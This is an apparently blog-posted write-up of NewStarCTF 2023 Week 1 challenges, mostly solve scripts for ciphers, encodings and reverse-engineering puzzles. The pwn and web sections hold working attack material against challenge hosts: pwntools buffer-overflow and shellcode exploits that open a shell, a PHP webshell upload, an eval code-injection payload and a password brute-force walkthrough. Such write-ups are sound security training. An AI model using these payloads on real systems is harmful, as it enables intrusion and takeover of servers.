[NewStarCTF2023]Week1


[NewstarCTF2023]Week1_Official

Crypto

Caesar's Secert

img

flag

flag{ca3s4r's_c1pher_i5_v4ry_3azy}

Fence

img

flag

flag{reordering_the_plaintext#686f8c03}

brainfuck

def shrinkBFCode(code):
    cPos2Vars = {}   #位置对应的变量
    cPos2Change = {}  #位置中 + 号 增加的值
    varPos = 0
    nCode = []
    incVal = 0
    lc = None
    dataChangeOp = set(['+', '-'])
    dataShiftOp = set(['>', '<'])
    for i in range(len(code)):
        c = code[i]
        if c not in dataChangeOp and lc in dataChangeOp:
            cPos2Change[len(nCode)] = incVal
            cPos2Vars[len(nCode)] = varPos
            nCode.append('+')
            incVal = 0
        if c == '>':
            varPos += 1
        elif c == '<':
            varPos -= 1
        else:
            if c in dataChangeOp:
                incVal += 1 if c == '+' else -1
            else:
                #if lc == '>' or lc == '<':
                #    cPos2Vars[len(nCode)] = varPos
                cPos2Vars[len(nCode)] = varPos
                nCode.append(c)
        lc = c

    return ''.join(nCode), cPos2Vars, cPos2Change

def generatePyCode(shellCode, pVars, pChange):
    pyCodes = []
    bStacks = []
    whileVarCache = {}
    for i, c in enumerate(shellCode):
        d_pos = i if i not in pVars else pVars[i]
        d_change = 1 if i not in pChange else pChange[i]
        indentLevel = len(bStacks)
        indentStr = ' '*(4*indentLevel)
        if c == '[':
            pyCodes.append('{}while data[{}] != 0:'.format(indentStr, d_pos))
            bStacks.append((c, i))
            whileVarCache[i] = {}
        elif c == ']':
            if bStacks[-1][0] != '[':
                raise Exception('miss match of {}] found between {} and {}'.format(bStacks[-1][0], bStacks[-1][1], i))
            cNum = i-bStacks[-1][1]    
            if cNum == 2:
                del pyCodes[-1]
                del pyCodes[-1]
                d_pos_l = i-1 if i-1 not in pVars else pVars[i-1]
                pyCodes.append('{}data[{}] = 0'.format(' '*(4*(indentLevel-1)), d_pos_l))
            whileCode = shellCode[bStacks[-1][1]+1 : i]
            if cNum>2 and '[' not in whileCode and not '%' in whileCode:  # nested loop is a bit complicated, just skip
                loopCondvar = bStacks[-1][1]
                d_pos_l = loopCondvar if loopCondvar not in pVars else pVars[loopCondvar]
                whileVars = whileVarCache[bStacks[-1][1]]
                cVarChange = whileVars[d_pos_l]
                # remove statement of same indent
                while len(pyCodes)>0 and pyCodes[-1].startswith(indentStr) and pyCodes[-1][len(indentStr)]!=' ':  
                    pyCodes.pop()
                pyCodes.pop()
                #del pyCodes[bStacks[-1][1]-i:]
                for vPos, vChange in whileVars.items():
                    if vPos == d_pos_l:
                        continue
                    ctimes = abs(vChange / cVarChange)
                    ctimesStr = '' if ctimes==1 else '{}*'.format(ctimes)
                    cSign = '+' if vChange > 0 else '-'
                    pyCodes.append('{}data[{}] {}= {}data[{}]'.format(' '*(4*(indentLevel-1)), 
                                                                        vPos, cSign,  ctimesStr, d_pos_l))
                pyCodes.append('{}data[{}] = 0'.format(' '*(4*(indentLevel-1)), d_pos_l))
            del whileVarCache[bStacks[-1][1]]
            bStacks.pop()
        elif c == '.':
            pyCodes.append('{}print(data[{}])'.format(indentStr, d_pos))
        elif c == ',':
            pyCodes.append('{}data[{}] = ord(stdin.read(1))'.format(indentStr, d_pos))
        elif c == '+':
            opSign = '-=' if d_change < 0 else '+='
            if pyCodes and pyCodes[-1] == '{}data[{}] = 0'.format(indentStr, d_pos):
                pyCodes[-1] = '{}data[{}] = {}'.format(indentStr, d_pos, d_change)
            else:
                pyCodes.append('{}data[{}] {} {}'.format(indentStr, d_pos, opSign, abs(d_change)))
            if bStacks:
                whileVarCache[bStacks[-1][1]].setdefault(d_pos, 0)
                whileVarCache[bStacks[-1][1]][d_pos] += d_change
        elif c == '-':
            opSign = '+=' if d_change < 0 else '-='
            if pyCodes and pyCodes[-1] == '{}data[{}] = 0'.format(indentStr, d_pos):
                pyCodes[-1] = '{}data[{}] = {}'.format(indentStr, d_pos, -d_change)
            else:
                pyCodes.append('{}data[{}] {} {}'.format(indentStr, d_pos, opSign, abs(d_change)))
            if bStacks:
                whileVarCache[bStacks[-1][1]].setdefault(d_pos, 0)
                whileVarCache[bStacks[-1][1]][d_pos] -= d_change
        elif c == '%':
            pyCodes.append('{}data[{}] %= data[{}]'.format(indentStr, d_pos, d_pos+1))
    return '\n'.join(pyCodes)

shellcode = "++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>++++++.>----.<-----.>-----.>-----.<<<-.>>++..<.>.++++++.....------.<.>.<<<<<+++.>>>>+.<<<+++++++.>>>+.<<<-------.>>>-.<<<+.+++++++.--..>>>>---.-.<<<<-.+++.>>>>.<<<<-------.+.>>>>>++."
shrinkCode, pVars, pChange = shrinkBFCode(shellcode)
print(generatePyCode(shrinkCode, pVars, pChange))

解密得到

data[0] += 8
data[2] += 2.0*data[0]
data[3] += 4.0*data[0]
data[4] += 6.0*data[0]
data[5] += 8.0*data[0]
data[6] += 10.0*data[0]
data[7] += 12.0*data[0]
data[8] += 14.0*data[0]
data[9] += 16.0*data[0]
data[10] += 18.0*data[0]
data[11] += 20.0*data[0]
data[12] += 22.0*data[0]
data[13] += 24.0*data[0]
data[14] += 26.0*data[0]
data[15] += 28.0*data[0]
data[16] += 30.0*data[0]
data[0] = 0
data[7] += 6
print(data[7])
data[8] -= 4
print(data[8])
data[7] -= 5
print(data[7])
data[8] -= 5
print(data[8])
data[9] -= 5
print(data[9])
data[6] -= 1
print(data[6])
data[8] += 2
print(data[8])
print(data[8])
print(data[7])
print(data[8])
data[8] += 6
print(data[8])
print(data[8])
print(data[8])
print(data[8])
print(data[8])
data[8] -= 6
print(data[8])
print(data[7])
print(data[8])
data[3] += 3
print(data[3])
data[7] += 1
print(data[7])
data[4] += 7
print(data[4])
data[7] += 1
print(data[7])
data[4] -= 7
print(data[4])
data[7] -= 1
print(data[7])
data[4] += 1
print(data[4])
data[4] += 7
print(data[4])
data[4] -= 2
print(data[4])
print(data[4])
data[8] -= 3
print(data[8])
data[8] -= 1
print(data[8])
data[4] -= 1
print(data[4])
data[4] += 3
print(data[4])
print(data[8])
data[4] -= 7
print(data[4])
data[4] += 1
print(data[4])
data[9] += 2
print(data[9])

简单修改一下输出得到
img
或者CTF在线工具
img

flag

flag{Oiiaioooooiai#b7c0b1866fe58e12}

Vigenère

Vigenere Solver
img

flag

flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}

babyrsa

from Crypto.Util.number import *
import binascii
import gmpy2
import rsa
from factordb.factordb import FactorDB
n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
e = 65537
a = FactorDB(n)
a.connect()
fac = a.get_factor_list()
phi_n = 1
for i in fac:
 phi_n *= (i-1)
d = gmpy2.invert(e, phi_n)
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
m = gmpy2.powmod(c, d, n)
print(binascii.unhexlify(hex(m)[2:]))
#flag{us4_s1ge_t0_cal_phI}

flag

flag{us4_s1ge_t0_cal_phI}

babyxor

enc = 'e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2'
cipher_hex = [int(enc[i:i+2],16) for i in range(0, len(enc), 2)]
#print(cipher_hex)
for key in range(255):
  flag = ''
  for c in cipher_hex:
    flag += chr(c ^ key)
  #print(flag)
  if 'flag' in flag:
    print(f'key={key}\n{flag}')
    break
#flag{x0r_15_symm3try_and_e4zy!!!!!!}

flag

flag{x0r_15_symm3try_and_e4zy!!!!!!}

small d

n,e都很大,直接考虑维纳攻击
github上找个脚本

import gmpy2
import libnum

def continuedFra(x, y):
    """计算连分数
    :param x: 分子
    :param y: 分母
    :return: 连分数列表
    """
    cf = []
    while y:
        cf.append(x // y)
        x, y = y, x % y
    return cf
def gradualFra(cf):
    """计算传入列表最后的渐进分数
    :param cf: 连分数列表
    :return: 该列表最后的渐近分数
    """
    numerator = 0
    denominator = 1
    for x in cf[::-1]:
        # 这里的渐进分数分子分母要分开
        numerator, denominator = denominator, x * denominator + numerator
    return numerator, denominator
def solve_pq(a, b, c):
    """使用韦达定理解出pq,x^2−(p+q)∗x+pq=0
    :param a:x^2的系数
    :param b:x的系数
    :param c:pq
    :return:p,q
    """
    par = gmpy2.isqrt(b * b - 4 * a * c)
    return (-b + par) // (2 * a), (-b - par) // (2 * a)
def getGradualFra(cf):
    """计算列表所有的渐近分数
    :param cf: 连分数列表
    :return: 该列表所有的渐近分数
    """
    gf = []
    for i in range(1, len(cf) + 1):
        gf.append(gradualFra(cf[:i]))
    return gf


def wienerAttack(e, n):
    """
    :param e:
    :param n:
    :return: 私钥d
    """
    cf = continuedFra(e, n)
    gf = getGradualFra(cf)
    for d, k in gf:
        if k == 0: continue
        if (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        p, q = solve_pq(1, n - phi + 1, n)
        if p * q == n:
            return d

n= 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
e= 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
c= 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
d=wienerAttack(e, n)
m=pow(c, d, n)
print(libnum.n2s(m).decode())
#flag{learn_some_continued_fraction_technique#dc16885c}

flag

flag{learn_some_continued_fraction_technique#dc16885c}

babyencoding

part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ=
part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY=
part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T`

part 1 base64: flag{dazzling_encoding#4e0ad4
part 2 base32: f0ca08d1e1d0f10c0c7afe422fea7
part 3 uuencode: c55192c992036ef623372601ff3a}
img

flag

flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}

Affine

仿射密码

def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)


def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    else:
        return x % m

modulus = 256
enc = bytes.fromhex(
    'dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064')
#print(enc)
for key_0 in range(256):
    
    try:
        inv_key_0 = modinv(key_0, modulus)
    except:
        continue 

    for key_1 in range(256):
        decrypted = bytes([(inv_key_0 * (c - key_1)) % modulus for c in enc])
        if b'flag{'in decrypted:
            print("Key found:", key_0, key_1)
            print("Decrypted flag:", decrypted)
#Key found: 17 23
#Decrypted flag: b'flag{4ff1ne_c1pher_i5_very_3azy}'

flag

flag{4ff1ne_c1pher_i5_very_3azy}

babyaes

from Crypto.Cipher import AES
import os
from flag import flag
from Crypto.Util.number import *


def pad(data):
    return data + b"".join([b'\x00' for _ in range(0, 16 - len(data))])


def main():
    flag_ = pad(flag)
    key = os.urandom(16) * 2
    iv = os.urandom(16)
    print(bytes_to_long(key) ^ bytes_to_long(iv) ^ 1)
    aes = AES.new(key, AES.MODE_CBC, iv)
    enc_flag = aes.encrypt(flag_)
    print(enc_flag)


if __name__ == "__main__":
    main()
# 3657491768215750635844958060963805125333761387746954618540958489914964573229
# b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'

搓个脚本

from Crypto.Cipher import AES
from Crypto.Util.number import *

a = 3657491768215750635844958060963805125333761387746954618540958489914964573229
enc = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
a = a ^ 1
#print(a)
print(long_to_bytes(a))
#_a = b'\x08 \x16 \x11 % \xa0 \xa6 \xc5 \xcb ^ \x02 \x99 N F ` \xea , \xeb L \x08 b \xc1 \x98 \xc2 \x07 \x8f \xa3 \xc1 O % q \xfc , '
key = b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,'
key = bytes_to_long(key)
iv = key ^ a
print(long_to_bytes(iv))

key = b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,'
iv = b'\xe3Z\x19Ga>\x07\xcc\xd1\xa1X\x01c\x11\x16\x00'
aes = AES.new(key, AES.MODE_CBC, iv)
dec_flag = aes.decrypt(enc)
print(dec_flag)
#b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,\xebL\x08b\xc1\x98\xc2\x07\x8f\xa3\xc1O%q\xfc,'
#b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,\xe3Z\x19Ga>\x07\xcc\xd1\xa1X\x01c\x11\x16\x00'
#b'firsT_cry_Aes\x00\x00\x00'

flag

flag{firsT_cry_Aes}

Misc

CyberChef's Secret

img

flag

flag{Base_15_S0_Easy_^_^}

空白格

whitespace
img

flag

flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}

机密图片

扫码的结果不对,应该有隐写
运用工具StegSolver
img
img

flag

flag{W3lc0m3_t0_N3wSt4RCTF_2023_7cda3ece}

隐秘的眼睛

SilentEye直接梭
img

flag

flag{R0ck1ng_y0u_63b0dc13a591}

流量!鲨鱼!

wireshark打开,大略看一下http,200 OK包很可疑
img
img
Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=
应该是base64,base64一次看到熟悉的Zmxh,就猜到要再base64一次
img

flag

flag{Wri35h4rk_1s_u53ful_b72a609537e6}

压缩包们

修复文件头,修复成功后后缀名改成.zip解压
img
flag.zip提示损坏
img
继续修复
img
或者你如果是高贵的bandizip pro用户
img
注意到flag.zip内有一段base64密文
解密出来是I like six-digit numbers because they are very concise and easy to remember.
img
应该是提示flag.zip的解压密码是六位数字,密码232311
img

flag

flag{y0u_ar3_the_m4ter_of_z1111ppp_606a4adc}

Reverse

easy_RE

img
img

flag

flag{welc0me_to_rev3rse!!}

Segments

shift+F7
img
手动过滤一下,修改格式得到flag

flag

flag{You_ar3_g0od_at_f1nding_ELF_segments_name}

upx -d 脱壳
img

exp

enc = 'gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~'
flag = ''
for i in enc:
  flag += chr(ord(i) - 1)
print(flag)

flag

flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}

ELF

encode加密完标准base64
img
img
先把密文base64解码成hex
img

exp

enc = [0x56, 0x5c, 0x51, 0x57, 0x6b, 0x74, 0x20, 0x8f, 0x24, 0x5f, 
       0x65, 0x8f, 0x27, 0x5e, 0x5f, 0x67, 0x8f, 0x67, 0x58, 0x51, 
       0x27, 0x8f, 0x75, 0x7c, 0x76, 0x8f, 0x21, 0x63, 0x2f, 0x6d]
flag = ''
for i in enc:
    flag += chr(i - 16 ^ 0x20)
print(flag)
#flag{D0_4ou_7now_wha7_ELF_1s?}

flag

flag{D0_4ou_7now_wha7_ELF_1s?}

AndroXor

jadx打开,循环异或
img

exp

enc = [14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r']
key = 'happyx3'
key_ascii = [ord(char) for char in key]
flag = ""
for i, value in enumerate(enc):
    key_value = key_ascii[i % len(key_ascii)]  
    if isinstance(value, int): 
        xor_result = value ^ key_value
    elif isinstance(value, str): 
        xor_result = ord(value) ^ key_value
    flag += chr(xor_result)
print(flag)
#flag{3z_And0r1d_X0r_x1x1}

flag

flag{3z_And0r1d_X0r_x1x1}

Endian

还是循环异或,因为小端序,所以异或因子是[0x78,0x56,0x34,0x12]
img
shift+E提取出array
img

exp

enc = [
  0x1E, 0x3A, 0x55, 0x75, 0x03, 0x3A, 0x58, 0x7B, 0x0C, 0x22, 
  0x58, 0x4D, 0x3D, 0x38, 0x50, 0x7B, 0x19, 0x38, 0x6B, 0x73, 
  0x05]
key = [0x78,0x56,0x34,0x12]
flag = ''
for i, value in enumerate(enc):
    key_value = key[i % len(key)] 
    flag += chr(value ^ key_value)
print(flag)
#flag{llittl_Endian_a}

flag

flag{llittl_Endian_a}

lazy_activity

非预期

img

正常解法

jadx打开有个flagactivity进程应该是点10000次出flag
img
打开模拟器app内提示'Where is my flag? Try to start another Activity.'
那就利用模拟器的adb工具

adb shell
su
am start -n com.droidlearn.activity_travel/.FlagActivity

img
模拟器弹出这个界面
img
鼠标连点器或者写python脚本模拟点击就行
网上随便找的脚本

import pyautogui as pd
import time
pd.FAILSAFE = True
 
time.sleep(3)
#3秒时间自己移动到要点击的位置
pd.click(clicks=100000,interval=0.0001)
# pyautogui.click()
# (100,100, clicks=2,interval=0.5,button=‘right’,duration=0.2)
# 位置,点击次数,间隔时间,右键(默认左键),移动间隔

img

flag

flag{Act1v1ty_!s_so00oo0o_Impor#an#}

EzPE

打不开,头文件被修改了
img
随便找个exe文件复制过来fix一下
img
简单的异或
img

exp

enc = [
  0x0A, 0x0C, 0x04, 0x1F, 0x26, 0x6C, 0x43, 0x2D, 0x3C, 0x0C, 
  0x54, 0x4C, 0x24, 0x25, 0x11, 0x06, 0x05, 0x3A, 0x7C, 0x51, 
  0x38, 0x1A, 0x03, 0x0D, 0x01, 0x36, 0x1F, 0x12, 0x26, 0x04, 
  0x68, 0x5D, 0x3F, 0x2D, 0x37, 0x2A, 0x7D]
flag = ''
l = len(enc)-2
for i in range(l,-1,-1):
    enc[i] ^=  (i ^ enc[i+1])
for i in enc:
    flag += chr(i)
print(flag)
#flag{Y0u_kn0w_what_1s_PE_File_F0rmat}

flag

flag{Y0u_kn0w_what_1s_PE_File_F0rmat}

PWN

ret2text

栈溢出

exp

from pwn import *
p=remote("node4.buuoj.cn",25617)
elf = ELF ('./ret2text')
backdoor = elf.symbols['backdoor']
payload = b'a'*40+p64(backdoor)
p.sendline(payload)
p.interactive()

newstar_shop

看附件知道是个整型溢出
shop里面的money是unsigned int,无符号整数,但是don't choose里面的money是int,有符号整数因此可以整数溢出,让他成为负数再返回购买。
依次输入1212313
img

ezshellcode

有个read
img
看看buf
img
直接传'\x90' 全nop

from pwn import *

banary = "./ezshellcode"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 25641
local = 0
if local:
    io = process(banary)
else:
    io = remote(ip, port)

context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

sh = shellcraft.sh()
payload = b'\x90'*(0x8+8) + asm(sh)
io.send(payload)
io.interactive()

img

random

有个随机数,直接调用
img

from pwn import *

banary = "./pwn"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 26831
local = 0
if local:
    io = process(banary)
else:
    io = remote(ip, port)

context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

clibc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
clibc.srand(clibc.time(0))
io.sendlineafter("number?\n",str(clibc.rand()))
io.interactive()

pieee

PIE保护
img
看看buf在栈中位置
img
传完buf 0x28个后直接跳到0x6c
img

from pwn import *

banary = "./pie"

elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 26955
local = 0
if local:
    io = process(banary)
else:
    io = remote(ip, port)

context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

payload = b'a'*(0x28)+b'\x6c'
io.send(payload)
io.interactive()

img

web

ErrorFlask

随便传两个参数
http://236f6195-02b3-4823-a05d-a72a6fb2080a.node4.buuoj.cn:81/?number1={{%201+1%20}}&number2=1
img

flag

flag{Y0u_@re_3enset1ve_4bout_deb8g}

Begin of HTTP

提示用get方式传参,那就http://node4.buuoj.cn:28821/?ctf=1
img
提示用post 传 secret
img
F12看一下源码,找一下 secret
得到 secret=n3wst4rCTF2023g00000d
img
post 传一下
img
改一下cookie,改成ctfer
img
改 User-Agent 为 NewStarCTF2023
img
改Referer为 newstarctf.com
img
最后改一下请求头

POST /?ctf=1 HTTP/1.1
Host: node4.buuoj.cn:28821
Content-Length: 28
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://node4.buuoj.cn:28821
Content-Type: application/x-www-form-urlencoded
User-Agent: NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: newstarctf.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: power=ctfer
Connection: close
Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
secret=n3wst4rCTF2023g00000d

img

泄露的秘密

找出泄露的敏感信息
访问 http://7dda953a-14dd-4219-bc4b-aee8b2ba0419.node4.buuoj.cn:81/www.zip
得到两个文件
robots.txtindex.php

PART ONE: flag{r0bots_1s_s0_us3ful
<?php
$PART_TWO = "_4nd_www.zip_1s_s0_d4ng3rous}";
echo "<h1>粗心的管理员泄漏了一些敏感信息,请你找出他泄漏的两个敏感信息!</h1>";

flag

flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}

Begin of Upload

前端有文件后缀名检测
img
直接在包中修改后缀名

POST / HTTP/1.1
Host: 56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81
Content-Length: 308
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJDwfZKOoSI69Xzwk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryJDwfZKOoSI69Xzwk
Content-Disposition: form-data; name="file"; filename="webshell2.php"
Content-Type: image/png

<?=system($_GET[2]);
------WebKitFormBoundaryJDwfZKOoSI69Xzwk
Content-Disposition: form-data; name="submit"

Upload!!!
------WebKitFormBoundaryJDwfZKOoSI69Xzwk--

传完之后访问
http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81/upload/webshell2.php?2=tac%20/fl*
img

flag

flag{32ae814a-7562-460c-a936-e6b88ed93f8f}

Begin of PHP

<?php
error_reporting(0);
highlight_file(__FILE__);

if(isset($_GET['key1']) && isset($_GET['key2'])){
    echo "=Level 1=<br>";
    if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
        $flag1 = True;
    }else{
        die("nope,this is level 1");
    }
}

if($flag1){
    echo "=Level 2=<br>";
    if(isset($_POST['key3'])){
        if(md5($_POST['key3']) === sha1($_POST['key3'])){
            $flag2 = True;
        }
    }else{
        die("nope,this is level 2");
    }
}

if($flag2){
    echo "=Level 3=<br>";
    if(isset($_GET['key4'])){
        if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
            $flag3 = True;
        }else{
            die("nope,this is level 3");
        }
    }
}

if($flag3){
    echo "=Level 4=<br>";
    if(isset($_GET['key5'])){
        if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
            $flag4 = True;
        }else{
            die("nope,this is level 4");
        }
    }
}

if($flag4){
    echo "=Level 5=<br>";
    extract($_POST);
    foreach($_POST as $var){
        if(preg_match("/[a-zA-Z0-9]/",$var)){
            die("nope,this is level 5");
        }
    }
    if($flag5){
        echo file_get_contents("/flag");
    }else{
        die("nope,this is level 5");
    }
}

get传参http://7cef97a6-de7f-45e3-be80-6aff9cecbbab.node4.buuoj.cn:81/?key1=QNKCDZO&key2=240610708&key4[]=%22%22&key5[]=1
hackbar传参key3[]=&_POST=1&flag5=1
img

R!C!E!

<?php
highlight_file(__FILE__);
if(isset($_POST['password'])&&isset($_POST['e_v.a.l'])){
    $password=md5($_POST['password']);
    $code=$_POST['e_v.a.l'];
    if(substr($password,0,6)==="c4d038"){
        if(!preg_match("/flag|system|pass|cat|ls/i",$code)){
            eval($code);
        }
    }
} 

爆破得到MD5(114514)='c4d038b4bed09fdb1471ef51ec3a32cd'
满足前6位是c4d038
hackbar传参
password=114514&e[v.a.l=eval($_POST[1]);&1=system("cat /fl*");
img
获取flag
password=114514&e[v.a.l=eval($_POST[1]);&1=system("cat /fl*");
img

EasyLogin

密码应该是个md5
img
随便注册个用户看看
img
登录成功后看看源代码可以肯定是md5
img
是个弱口令
img
尝试爆破admin
img
发送到intruder
payload位置选择pwd
img
payload设置一下,尝试用1400w_rockyou字典爆破, processing设置成md5
img
有个8360的不一样,应该就是爆破成功的,把pw复制一下
img
回到登录界面,登录admin,pw随便写,拦截到请求包后把pw修改成复制的pw
记得在proxy setting里面把抓返回包的也开一下
img
img
修改完pw后一直点放行,抓到含flag的response包
img

posted @ 2023-09-26 00:27  Tree_24  阅读(149)  评论(0编辑  收藏  举报